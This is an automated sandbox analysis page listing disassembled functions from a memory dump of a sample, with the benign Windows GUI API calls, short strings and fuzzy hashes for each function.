Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$InvalidateKillTimer$ClientCursorRedrawScreenValidateWindow_clock
String ID:
API String ID: 3482734790-0
Opcode ID: 08497c751eff391bf64a908ae71c308ee7048294bcf8dda222aeb0ace4a929f8
Instruction ID: 4ce80cf29560d9f7e66c9494bc2dc274cbf713f645d87514fa55f61946c80c93
Opcode Fuzzy Hash: 08497c751eff391bf64a908ae71c308ee7048294bcf8dda222aeb0ace4a929f8
Instruction Fuzzy Hash: 32716B31610A46EFCB21DF24C9C9AEEBBF5FF58300F20486AE45A96151DBB0A9D1DB50

Function 001CA6E4 Relevance: 16.6, APIs: 11, Instructions: 149windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001CA6EE
GetMenuItemCount.USER32(?), ref: 001CA720
GetSubMenu.USER32(?,?), ref: 001CA764
GetMenuState.USER32(?,?,00000400), ref: 001CA77D
GetSubMenu.USER32(?,?), ref: 001CA7EC
GetMenuStringW.USER32(?,?,?,00000100,00000400), ref: 001CA811
_wcslen.LIBCMT ref: 001CA868
AppendMenuW.USER32(00000000,00000010,00000000,?), ref: 001CA896
GetMenuItemCount.USER32(00000000), ref: 001CA8D5
GetMenuItemID.USER32(?,?), ref: 001CA90E
InsertMenuW.USER32(?,?,00000000,00000000), ref: 001CA924

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$Item$Count$AppendH_prolog3_InsertStateString_wcslen
String ID:
API String ID: 881407318-0
Opcode ID: a75b22a470ede50cbb47eb93aefdd146d44cf5b265241fdca1217e6c95b02725
Instruction ID: 978c47a0d126e30de2a3f1ce0a7100f5e28317dd124f3ed9b58167f17d474490
Opcode Fuzzy Hash: a75b22a470ede50cbb47eb93aefdd146d44cf5b265241fdca1217e6c95b02725
Instruction Fuzzy Hash: C471DE7584122DAFCB219F94DC8CBE9BBB5FF28314F5041E9E509A6261CB309E90CF51

Function 00217CEF Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 348COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00217CF6
GetWindow.USER32(?,00000005), ref: 00217D5A

Part of subcall function 002173E0: __EH_prolog3.LIBCMT ref: 002173E7
Part of subcall function 002173E0: GetWindow.USER32(?,00000005), ref: 00217407
Part of subcall function 002173E0: GetWindow.USER32(?,00000002), ref: 0021743D

Strings

2, xrefs: 00217F17
83/, xrefs: 00217DC2

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$H_prolog3
String ID: 83/$2
API String ID: 1351209170-1965019549
Opcode ID: 480828af89569d4ac0fdbce356f013cfbe9a98f63d463d27e9bef1edcdc76374
Instruction ID: 9ac66d558443ace21faad0f6b25e55bdcd517cf5a5fb6deed8330f0b251bc66c
Opcode Fuzzy Hash: 480828af89569d4ac0fdbce356f013cfbe9a98f63d463d27e9bef1edcdc76374
Instruction Fuzzy Hash: A1D14730A1020A9FDF14EFA4C899BEEB7F5BF68300F140569F506AB292DF749991CB51

Function 001EB305 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 309timewindowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001EB30C
SetCursor.USER32(00000040,001EBA9B,00000000,00000000,?), ref: 001EB3A6

Part of subcall function 001D03A2: __EH_prolog3.LIBCMT ref: 001D03A9
Part of subcall function 001D03A2: GetDC.USER32(00000000), ref: 001D03D5

Part of subcall function 002034C2: __EH_prolog3_GS.LIBCMT ref: 002034C9
Part of subcall function 002034C2: CreateRectRgnIndirect.GDI32(?), ref: 00203506
Part of subcall function 002034C2: CopyRect.USER32(?,?), ref: 0020351C
Part of subcall function 002034C2: InflateRect.USER32(?,?,?), ref: 00203532
Part of subcall function 002034C2: IntersectRect.USER32(?,?,?), ref: 00203540
Part of subcall function 002034C2: CreateRectRgnIndirect.GDI32(?), ref: 0020354A
Part of subcall function 002034C2: CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0020355F
Part of subcall function 002034C2: CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 002035C7

Part of subcall function 001D03F6: __EH_prolog3.LIBCMT ref: 001D03FD
Part of subcall function 001D03F6: ReleaseDC.USER32(?,00000000), ref: 001D041A

GetFocus.USER32 ref: 001EB445
SetTimer.USER32(?,00000014,000001F4,00000000), ref: 001EB505
SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 001EB5AA
KillTimer.USER32(?,00000014), ref: 001EB6D6
SetTimer.USER32(?,00000014,000001F4,00000000), ref: 001EB6F3
UpdateWindow.USER32(?), ref: 001EB712

Strings

<L/, xrefs: 001EB69A

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Create$Timer$H_prolog3H_prolog3_Indirect$CopyCursorFocusInflateIntersectKillMessageReleaseSendUpdateWindow
String ID: <L/
API String ID: 2399994607-623769782
Opcode ID: fa016b2c1a7ffb00b71a4f7b071fb2871fc6b9df0a28e0540bebd853eec60144
Instruction ID: ec39ecea389e3a686d66a5375240cd26eb7f83eca68795fe083f0d0e29ce53b3
Opcode Fuzzy Hash: fa016b2c1a7ffb00b71a4f7b071fb2871fc6b9df0a28e0540bebd853eec60144
Instruction Fuzzy Hash: 80C15E70608A44DFDF259F65C8C5BAE77A5AF48324F284279FC1A9E2D6DB709840CB60

Function 00274FD2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 150keyboardCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00274FD9
_wcslen.LIBCMT ref: 00275005
_memset.LIBCMT ref: 00275016
GetKeyboardLayout.USER32(00000000), ref: 0027501F
MapVirtualKeyExW.USER32(00000000,00000000,00000000), ref: 00275028
GetKeyNameTextW.USER32(00000000,?,00000032), ref: 0027504F
_wcslen.LIBCMT ref: 00275059
IsCharLowerW.USER32(00000000,?,00000000), ref: 0027508B

Strings

Pause, xrefs: 00274FFF, 00275004, 0027500C

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: _wcslen$CharH_prolog3_KeyboardLayoutLowerNameTextVirtual_memset
String ID: Pause
API String ID: 192923521-375111145
Opcode ID: eba464bd3b933dedadab3771fde096073f32dc26ba572f58e9b2417d8c0d782f
Instruction ID: a9601618ab29d05a8ec22b522a5eadbb92223f8bf61334f3b23d9661d076e476
Opcode Fuzzy Hash: eba464bd3b933dedadab3771fde096073f32dc26ba572f58e9b2417d8c0d782f
Instruction Fuzzy Hash: A2411A31A106249ADB31AB64DC85FEEF7A8AF54700F10841DF559A7192CFF09C60DBA1

Function 0023BB91 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 149windowCOMMON

Download Yara Rule

APIs

ReleaseCapture.USER32 ref: 0023BBC1
IsWindow.USER32(?), ref: 0023BBE2
DestroyWindow.USER32(?), ref: 0023BBF2
GetParent.USER32(?), ref: 0023BC0E
IsRectEmpty.USER32(?), ref: 0023BCBA
IsWindowVisible.USER32(?), ref: 0023BCFC
MapWindowPoints.USER32(?,?,?,00000001), ref: 0023BD13
SendMessageW.USER32(?,00000202,?,?), ref: 0023BD32

Strings

2, xrefs: 0023BC1B

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$CaptureDestroyEmptyMessageParentPointsRectReleaseSendVisible
String ID: 2
API String ID: 3509494761-3001879987
Opcode ID: 26388d2a31a8f6bde8c27f8fcd9168683e3690b6e52e190e90b0e73dea9b8314
Instruction ID: a26ba8e44f047ed2fb98f590783a4f2f73a9c0c10c6199de167872bb54e822ae
Opcode Fuzzy Hash: 26388d2a31a8f6bde8c27f8fcd9168683e3690b6e52e190e90b0e73dea9b8314
Instruction Fuzzy Hash: C7518C713102469FDF129F64C899BAA37B5AF05305F4804B9FA0A9F1A6DB70D814CB61

Function 002095DC Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 002095E3

Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09

swprintf.LIBCMT ref: 0020962D
_wcslen.LIBCMT ref: 00209636

Part of subcall function 001C5E30: _memcpy_s.LIBCMT ref: 001C5EC9

_wcslen.LIBCMT ref: 00209651
_wcslen.LIBCMT ref: 00209688
swprintf.LIBCMT ref: 002096B4
_wcslen.LIBCMT ref: 002096BD

Strings

:%d, xrefs: 00209622, 002096A9
- , xrefs: 0020964B, 00209650, 00209658, 00209682, 00209687, 0020968F

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: _wcslen$swprintf$H_prolog3_LongWindow_memcpy_s
String ID: - $:%d
API String ID: 3834591121-2359489159
Opcode ID: 90bea37e966b6161c068e9bf7b2c7a48d048922f804821b3101018548b8f6fff
Instruction ID: 7ced1d7ac282b15be6dd9073b4c9c3ecb4bf1fa226a97bec365f6dcc2a70c0f8
Opcode Fuzzy Hash: 90bea37e966b6161c068e9bf7b2c7a48d048922f804821b3101018548b8f6fff
Instruction Fuzzy Hash: C23188729206056BDB05EBE0CD96EEFB36DAF20300F444429B506AB157DF74EE648B90

Function 001C8570 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 001C8599

Part of subcall function 002BF7E9: RaiseException.KERNEL32(001CA2E2,?,00000000,?,001CA2E2,?,?,001C106C,00000000), ref: 002BF82B

std::exception::exception.LIBCMT ref: 001C85C0
__CxxThrowException@8.LIBCMT ref: 001C85DF
std::exception::exception.LIBCMT ref: 001C8601
__CxxThrowException@8.LIBCMT ref: 001C8620
std::exception::exception.LIBCMT ref: 001C863D
__CxxThrowException@8.LIBCMT ref: 001C865C

Strings

d!1, xrefs: 001C8654
|*1, xrefs: 001C85B8

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Exception@8Throw$std::exception::exception$ExceptionRaise
String ID: d!1$|*1
API String ID: 4237746311-4264203618
Opcode ID: c428295662a608dd8f3cef86ddaba78cde4a9f21220dc2185409e48a40a2dafd
Instruction ID: 3c7eda3f3a78ecfd223868dcb525ecff6af0259233ee44fc32dc91f01238b29d
Opcode Fuzzy Hash: c428295662a608dd8f3cef86ddaba78cde4a9f21220dc2185409e48a40a2dafd
Instruction Fuzzy Hash: 2A217FB24143415FC315EF59D402ADFB7E8BFD8744F14895EF59856241EFB085188F62

Function 002A6D98 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 40COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 002A6D9F

Part of subcall function 001D61F6: EnterCriticalSection.KERNEL32(00333728,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D6230
Part of subcall function 001D61F6: InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D6242
Part of subcall function 001D61F6: LeaveCriticalSection.KERNEL32(00333728,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D624F
Part of subcall function 001D61F6: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D625F

GetProfileIntW.KERNEL32(windows,DragScrollInset,0000000B), ref: 002A6DEF
GetProfileIntW.KERNEL32(windows,DragScrollDelay,00000032), ref: 002A6DFE
GetProfileIntW.KERNEL32(windows,DragScrollInterval,00000032), ref: 002A6E0D

Strings

windows, xrefs: 002A6DE9, 002A6DEE, 002A6DF8, 002A6E07
DragScrollDelay, xrefs: 002A6DF3
DragScrollInterval, xrefs: 002A6E02
Dz0, xrefs: 002A6DB6
DragScrollInset, xrefs: 002A6DE4

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: CriticalSection$Profile$Enter$H_prolog3InitializeLeave
String ID: DragScrollDelay$DragScrollInset$DragScrollInterval$Dz0$windows
API String ID: 4229786687-1486194555
Opcode ID: 6298c58cc1c7d0068dfdd82018bb93f6455845066eb6b76e72ed306b80278f2b
Instruction ID: e17f30140be18cd5a2490f3da003e40e88fc3843c3ea7348b48fd2948b1c52e7
Opcode Fuzzy Hash: 6298c58cc1c7d0068dfdd82018bb93f6455845066eb6b76e72ed306b80278f2b
Instruction Fuzzy Hash: E701A7B0A91740AFD726EF658D42B8AB6E8BFA4700F40051AF2486B3E1CBF45504CB04

Function 00212E2E Relevance: 15.1, APIs: 10, Instructions: 112windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(00000000), ref: 00212E61
IsWindowVisible.USER32(00000000), ref: 00212E70
GetSystemMetrics.USER32(00000021), ref: 00212EA2
GetSystemMetrics.USER32(00000021), ref: 00212EA9
GetSystemMetrics.USER32(00000020), ref: 00212EAF

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

IsWindowVisible.USER32(00000000), ref: 00212ED7
IsWindowVisible.USER32(00000000), ref: 00212EE6
IsZoomed.USER32(00000000), ref: 00212F0C
GetSystemMetrics.USER32 ref: 00212F28
GetSystemMetrics.USER32(00000004), ref: 00212F6B

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: MetricsSystem$VisibleWindow$Exception@8H_prolog3ThrowZoomed
String ID:
API String ID: 1383962431-0
Opcode ID: 00c177004811b04c2616894e6248c5e26640045669964e54e895307cdc7fa95a
Instruction ID: 5a0cad6fbb69005a13bbd5ac441abcec53920050f8d0d1cf317d8b400dae2213
Opcode Fuzzy Hash: 00c177004811b04c2616894e6248c5e26640045669964e54e895307cdc7fa95a
Instruction Fuzzy Hash: DA416831220242DFDB219F25C988BE677F4FF24354F044069F9998B2A1EB70ECA5CB51

Function 00209E68 Relevance: 15.1, APIs: 10, Instructions: 109COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,00000000,?), ref: 00209E8E
GetWindowRect.USER32(?,?), ref: 00209EB1
SetRect.USER32(?,?,00000000,?,?), ref: 00209EF1
InvalidateRect.USER32(?,?,00000001), ref: 00209F00
SetRect.USER32(?,?,00000000,?,?), ref: 00209F17
InvalidateRect.USER32(?,?,00000001), ref: 00209F26
SetRect.USER32(?,00000000,?,?,?), ref: 00209F57
InvalidateRect.USER32(?,?,00000001), ref: 00209F62
SetRect.USER32(?,00000000,?,00000001,?), ref: 00209F79
InvalidateRect.USER32(?,?,00000001), ref: 00209F84

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Invalidate$Window$Proc
String ID:
API String ID: 570070710-0
Opcode ID: c8b42532eaa217bec46a7aef66e00652afcda3a5c6d8c3e0d4d237951bbda3e4
Instruction ID: 66158d1fac37cfaa8d950ba20429fe4c8b8b9868441c76c6ff02c0eede581aeb
Opcode Fuzzy Hash: c8b42532eaa217bec46a7aef66e00652afcda3a5c6d8c3e0d4d237951bbda3e4
Instruction Fuzzy Hash: E1410CB691021AAFDB04CFA4DE89EAFBBBCFB08700F104115FA45A7551D770AA50CFA1

Function 0021C677 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 0021C695
WindowFromPoint.USER32(?,?,?,00000001,?,00000000), ref: 0021C6A4
GetActiveWindow.USER32 ref: 0021C6C6
GetCurrentThreadId.KERNEL32 ref: 0021C6DE
GetWindowThreadProcessId.USER32(?,00000000), ref: 0021C6ED
GetDesktopWindow.USER32 ref: 0021C6F9

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Thread$ActiveCaptureCurrentDesktopFromPointProcess
String ID:
API String ID: 1298419125-0
Opcode ID: 409b2f466325c48ca087048a8036afdc7108ede806c8e81d7b4294968a41440d
Instruction ID: 41efd06cb3635324ad4d09a22a2fe77bc597450b181624c0dc7c8fe4d1008835
Opcode Fuzzy Hash: 409b2f466325c48ca087048a8036afdc7108ede806c8e81d7b4294968a41440d
Instruction Fuzzy Hash: DE317079990216DFCB21AFA4D9888EDBBF9BB64300B314465E445AB290DFB08D92CF51

Function 001EA559 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 299COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 001EA5D3
GetClientRect.USER32(?,?), ref: 001EA5E6
GetWindowRect.USER32(?,?), ref: 001EA634
GetParent.USER32(?), ref: 001EA63D
GetParent.USER32(?), ref: 001EA85A
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 001EA87E

Strings

0\/, xrefs: 001EA886
83/, xrefs: 001EA64A

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Parent$RectWindow$ClientRedraw
String ID: 0\/$83/
API String ID: 443302174-1463869021
Opcode ID: 8d84d94827642b486edc547eee002bd814c4704fd48f9cbb14d1ac74a2cd36a4
Instruction ID: f28e2e8809067304137f0a94820040224eff91ff5c0cc8fb99f388766db5b118
Opcode Fuzzy Hash: 8d84d94827642b486edc547eee002bd814c4704fd48f9cbb14d1ac74a2cd36a4
Instruction Fuzzy Hash: 57B16B35E006589FCF15DFA9C888AEEBBB5FF48701F5541A9E406AB255CB30A940CF62

Function 001DAEBD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 69windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 001DAF0B
SetActiveWindow.USER32(?), ref: 001DAF1D
SendMessageW.USER32(?,00000112,?,?), ref: 001DAF33
IsWindow.USER32(?), ref: 001DAF40
SetActiveWindow.USER32(?), ref: 001DAF47
IsWindow.USER32(?), ref: 001DAF4C
SetFocus.USER32(?), ref: 001DAF56

Strings

u, xrefs: 001DAF5E

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
